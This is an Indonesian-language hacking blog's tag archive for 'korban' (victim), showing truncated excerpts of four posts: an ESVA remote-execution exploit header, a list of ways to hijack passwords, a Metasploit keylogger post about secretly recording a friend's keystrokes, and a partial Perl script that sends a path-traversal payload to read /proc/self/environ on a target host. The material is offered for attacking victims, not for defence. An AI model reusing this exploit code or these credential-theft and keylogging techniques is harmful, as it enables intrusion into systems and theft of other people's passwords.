Home / Tag Archives: korban

Tag Archives: korban

E-Mail Security Virtual Appliance (ESVA) Exploit.

black-hat-logo

# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution. # Date: 10 Aug 2012 # Exploit Author: iJoo # Vendor Homepage: http://www.esvacommunity.com/ # Software Link: http://sourceforge.net/projects/esva-project/ # Version: < 2.0.6 ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, …

Read More »

Bebagai Cara Membajak Password

SocialEngineering

Ada banyak cara untuk mendapatkan suatu password / membajak password / crack password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan : [1]. Social Engineering [2]. KeyLogger [3]. Web Spoofing [4]. Menghadang Email [5]. Password Cracking [6]. Session Hijacking [7]. Menjadi Proxy …

Read More »

Keylogger Dengan Metasploit

162750_1401465651775_1686336794_811864_4285701_n

Iseng-iseng again.. mengapa judulnya kayak gini (Merekam ketukan keyboard target tanpa menyentuh komputernya – keylogger canggih), iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente kalo mau ngerjain temen buat ngerekam keyboard target pake keyloger dengan harapan si korban masukin email dan lain sebagainya.. Ente mondar mandir berkali kali kekomputer …

Read More »

LFI Remote Execute in PERL

black-hat-logo

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell. #! /usr/bin/perl use LWP; use HTTP::Request; if (@ARGV < 1) { print "\n==========================================\n"; print " LFI Command Execution \n"; print "==========================================\n"; print "Usage: perl LFI.pl (without http:://)\n"; print "Ex. perl FLI.pl www.korban.com/index.php?page=\n"; exit; } $host=$ARGV[0]; $lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"; print "Try …

Read More »